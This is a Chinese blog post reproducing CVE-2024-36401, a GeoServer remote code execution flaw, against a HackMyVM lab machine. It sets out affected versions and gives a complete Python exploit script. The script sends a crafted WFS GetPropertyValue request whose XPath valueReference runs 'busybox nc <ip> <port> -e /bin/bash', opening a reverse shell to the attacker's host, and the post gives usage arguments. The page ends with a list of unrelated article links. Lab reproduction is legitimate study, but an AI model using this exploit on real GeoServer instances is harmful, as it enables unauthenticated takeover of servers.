当前位置：首页 > article >正文

CVE-2024-36401复现

article 2026/3/31 14:11:20

一.漏洞概述CVE-2024-36401 是 GeoServer 中的一个严重级远程代码执行漏洞CVSS 9.8允许未经身份验证的远程攻击者在服务器上执行任意代码。该漏洞源于 GeoServer 调用的 GeoTools 库 API 在评估 XPath 表达式时存在不安全处理导致攻击者可以通过构造特制的请求执行任意代码。影响版本版本范围状态GeoServer 2.23.6受影响2.24.0 ≤ GeoServer 2.24.4受影响2.25.0 ≤ GeoServer 2.25.2受影响安全版本2.23.6、2.24.4、2.25.2 及以上二.环境搭建直接用hackmyvm上的靶机https://hackmyvm.eu/machines/machine.php?vmVictorique目标网站搓一个py代码import requests import argparse def send_request(_target,_port,_ip,_myport): if _port: target f{_target}:{_port} url fhttp://{target}/geoserver/wfs else: target f{_target} url fhttp://{target}/geoserver/wfs headers { Host: target, Content-Type: application/xml, } payload f wfs:GetPropertyValue serviceWFS version2.0.0 xmlns:topphttp://www.openplans.org/topp xmlns:feshttp://www.opengis.net/fes/2.0 xmlns:wfshttp://www.opengis.net/wfs/2.0 valueReferenceexec(java.lang.Runtime.getRuntime(),busybox nc {_ip} {_myport} -e /bin/bash) wfs:Query typeNamessf:archsites/ /wfs:GetPropertyValue try: response requests.post(url, headersheaders, datapayload, timeout30, verifyFalse) if response.status_code in [401, 404, 403]: print(エラー) exit() else: print(成功) except requests.exceptions.RequestException as e: print(error, fAn error occurred: {e}) print(error, Failed to send request!) def main(): parser argparse.ArgumentParser(descriptionCVE-2024-36401) parser.add_argument(--target, requiredTrue, helpターゲットのホスト名を入力してください例:http://example.com) parser.add_argument(--target_port, requiredTrue, helpターゲットのport番号入力してください例:8080) parser.add_argument(--myip, requiredTrue, help自分のIPを入力してください例:10.10.10.12) parser.add_argument(--myport, requiredTrue, help自分の待ち受けポート番号を入力してください例:9000) args parser.parse_args() target args.target port args.target_port ip args.myip myport args.myport send_request(target,port,ip,myport) if __name__ __main__: main()使用参数python CVE-2024-36401.py --target example.com --target_port 8080 --myip 172.26.16.100 --myport 9000三.攻击复现监听运行代码拿到shell

CVE-2024-36401复现

相关文章：

CVE-2024-36401复现

TradingAgents-CN 多智能体金融分析系统：企业级容器化部署实战指南

Windows 10/11下用StyleGAN2-ADA-PyTorch训练自己的数据集（避坑Visual Studio编译错误）

AutoRaise：macOS窗口悬停管理的技术实现与配置指南

CoPaw个人助理深度体验：多通道对话+定时执行，解放双手的实用工具

Wan2.2-I2V-A14B实战案例：地方政府生成‘乡村振兴’政策解读动画短视频系列

主体代码分析

别再花冤枉钱！和腰突颈椎病斗了 3 年，我终于踩中了康复的捷径

Ollama+Qwen2.5-VL搭建教程：打造你的智能视觉分析工具

专业安防怎么选？奥尔特云与普通摄像头核心性能对比

告别桌面图标混乱：NoFences让你的数字空间井然有序

视频号推客模式系统小程序开发

算法模拟类题目解析

华为云AI开发认证HCCDA通关指南：从试题解析到实战应用

从黑客攻防角度看网络命令：如何用ping/tracert/nslookup发现网络安全隐患

MT5 Zero-Shot参数详解：Temperature与Top-P对中文改写多样性的影响

别再折腾了！保姆级AirSim+UE5.3安装配置指南（附常见编译错误解决）

别只盯着协议！用TC8测试案例深度解读车载网络中的ARP与ICMP：安全与稳定的隐藏关卡

Marp CLI元数据管理：如何优化SEO和社交媒体分享

广东省高级会计师评审辅导知名品牌

3步掌握AI模型训练：让新手也能玩转个性化Stable Diffusion模型

高效智能转换方案：B站缓存视频一键处理实战指南

Ubuntu系统资源监控实战：从命令行到图形化工具全解析

Pi0具身智能v1快速部署指南：一键启动交互测试页面

智能猫砂盆：除臭静音，养猫更省心！

MediaPipe模型优化：从性能瓶颈到实时推理的全流程解决方案

CTF逆向实战：从RC4到Base64，手把手拆解CTFshow赛题

从旅游Vlog到新闻视频：QVHIGHLIGHTS数据集在跨领域应用中的实战指南

新手福音：通过快马平台生成带详解代码，轻松完成openclaw首次本地部署

FactoryBluePrints：颠覆性全流程工厂自动化解决方案